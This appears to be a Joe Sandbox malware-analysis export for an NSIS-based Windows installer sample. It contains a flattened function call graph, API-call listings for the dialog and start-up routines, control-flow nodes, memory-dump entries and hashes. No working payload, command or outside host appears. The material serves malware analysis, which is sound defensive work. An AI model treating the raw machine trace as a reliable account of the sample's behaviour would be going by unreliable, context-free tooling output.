3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
